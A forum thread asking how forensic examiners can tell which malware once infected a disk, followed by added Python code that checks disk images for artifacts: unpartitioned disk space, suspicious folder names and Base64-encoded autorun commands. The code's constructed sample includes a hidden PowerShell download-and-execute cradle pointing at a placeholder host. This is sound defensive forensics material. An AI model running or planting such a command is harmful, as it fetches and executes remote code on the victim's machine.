Is it simple for computer forensic experts to tell if certain malware infected a computer ?

2 Posts
2 Users
0 Likes
1,373 Views
(@kurt2121), topic starter

I'll start off by saying I know next to nothing about this kind of stuff.

My mother's old laptop has a hidden partition at the end of the disk, something the TDSS malware was known for. Additionally, there were folders or file-system entries with all these "ntunistall$$" titles that, to my knowledge, only the ZeroAccess botnet created (backed up by antivirus software showing ZeroAccess). Kind of like unique footprints left behind.

That got me thinking: does every major malware leave behind clues so that you can say "aha! This was an infection caused by Zeus!", for example? Even long after it's been cleaned up with antivirus software? I'd find it super interesting to go back through it and see what other kinds of infections I could find.

Let's say I said to you, "I'd like to see if this hard drive had a Zeus infection or a Zlob infection or a Torpig infection at one point in time." Would you be able to say, "Yep, just look for this, this and this"? I hope I'm making sense.

Posted : 27/11/2020 7:40 pm
UnallocatedClusters (@unallocatedclusters)

Have you tried running one or more antivirus tools against the hard drive contents?

Here is a relatively reliable and free-to-use anti-virus tool: Immunet AntiVirus

Try running multiple anti-virus tools against the hard drive contents and see if you get any positive hits.

Generally speaking, malware will attempt to hide its tracks, such as by turning off Windows event logs, creating Base64-encoded persistence, etc., so identifying the changes made to a computer by malware requires significant expertise and experience.

Posted : 30/11/2020 9:40 pm
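As an added example that is not part of either post above: the three kinds of "footprint" the thread mentions (unpartitioned space after the last partition, folder names that match a known pattern, and Base64-encoded commands in autorun values) can each be checked with a few lines of Python. Everything below is constructed for illustration: the MBR is built in code, the directory tree is created in a temp folder, the Run-key values are made-up strings, and the `ntunistall`-style name pattern is an assumption modelled on the poster's description, not an authoritative signature for ZeroAccess or any other family. On a real disk you would feed `trailing_unpartitioned_sectors` the first 512 bytes of the image plus its total sector count, point `find_suspicious_dirs` at the mount point of the image, and run `decode_encoded_args` over values exported from the Run keys.

```python
"""Added example (not from either poster): three small artifact checks of the
kind the thread talks about. All inputs are constructed here so it runs offline;
the name pattern is an assumption, not an authoritative malware signature."""
import base64
import binascii
import re
import struct
from pathlib import Path
from tempfile import TemporaryDirectory

SECTOR_BYTES = 512


# --- 1. Space after the last partition (the "hidden partition at the end of the disk") ---

def build_mbr(partitions):
    """Constructed MBR for testing: partitions = [(type, lba_start, sector_count), ...]."""
    mbr = bytearray(SECTOR_BYTES)
    for i, (ptype, start, count) in enumerate(partitions[:4]):
        off = 446 + 16 * i            # the partition table starts at byte 446
        mbr[off + 4] = ptype          # byte 4 of each 16-byte entry is the partition type
        struct.pack_into("<II", mbr, off + 8, start, count)  # bytes 8..15: LBA start, size
    mbr[510:512] = b"\x55\xaa"        # boot signature
    return bytes(mbr)


def trailing_unpartitioned_sectors(mbr: bytes, disk_sectors: int) -> int:
    """Parse the four primary entries and return how many sectors follow the last
    partition. A large gap is worth carving or inspecting; it is not proof of anything,
    since alignment padding and GPT backup headers also live there."""
    if len(mbr) < SECTOR_BYTES or mbr[510:512] != b"\x55\xaa":
        raise ValueError("not an MBR: bad boot signature")
    last_end = 0
    for i in range(4):
        off = 446 + 16 * i
        ptype = mbr[off + 4]
        start, count = struct.unpack_from("<II", mbr, off + 8)
        if ptype == 0 or count == 0:  # empty entry
            continue
        last_end = max(last_end, start + count)
    return max(disk_sectors - last_end, 0)


# --- 2. Folder names that match an indicator pattern ---

# Assumption: a pattern shaped like the poster's "ntunistall$$" folders
# (optional leading '$', "ntuni(n)stall", anything, one or more trailing '$').
SUSPICIOUS_DIR_PATTERNS = [re.compile(r"^\$?ntuni(?:n)?stall\w*\$+$", re.I)]


def find_suspicious_dirs(root: Path, patterns=SUSPICIOUS_DIR_PATTERNS):
    """Walk a mounted image (or any directory) and return matching directory paths."""
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_dir() and any(pat.search(p.name) for pat in patterns)
    )


def demo_directory_scan():
    """Build a constructed tree in a temp dir and scan it."""
    with TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel in ("Windows/System32", "Users/mom/Documents",
                    "Windows/ntunistall$$", "Windows/$NtUninstallKB12345$"):
            (root / rel).mkdir(parents=True)
        return find_suspicious_dirs(root)


# --- 3. Base64-encoded commands in autorun values ---

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_encoded_args(run_value: str):
    """Return every long base64 token in a Run-key value that decodes to readable
    ASCII or UTF-16LE text (the PowerShell -EncodedCommand shape)."""
    decoded = []
    for tok in B64_TOKEN.findall(run_value):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue
        for enc in ("ascii", "utf-16-le"):  # ASCII first: UTF-16 text has NULs, so it fails isprintable
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if text.isascii() and text.isprintable():
                decoded.append(text)
                break
    return decoded


# Constructed sample Run values (not real registry exports).
SAMPLE_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
CONSTRUCTED_RUN_VALUES = {
    "OneDrive": r'"C:\Users\mom\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": "powershell.exe -w hidden -enc "
               + base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-16-le")).decode(),
}


if __name__ == "__main__":
    mbr = build_mbr([(0x07, 2048, 99_000_000)])  # one NTFS partition on a 100M-sector disk
    gap = trailing_unpartitioned_sectors(mbr, 100_000_000)
    print(f"unpartitioned tail: {gap} sectors ({gap * SECTOR_BYTES // 2**20} MiB)")
    print("suspicious dirs:", demo_directory_scan())
    for name, value in CONSTRUCTED_RUN_VALUES.items():
        print(name, "->", decode_encoded_args(value))
```

The caveat from the reply above applies to every one of these checks: a hit is a lead, not an attribution. Unpartitioned space at the end of a disk is common on clean machines, a folder name can be mimicked or coincidental, and an encoded PowerShell command is used by plenty of legitimate software. Attributing a past infection to a particular family still needs corroborating artifacts (the AV detection names, file hashes, and timestamps) examined together.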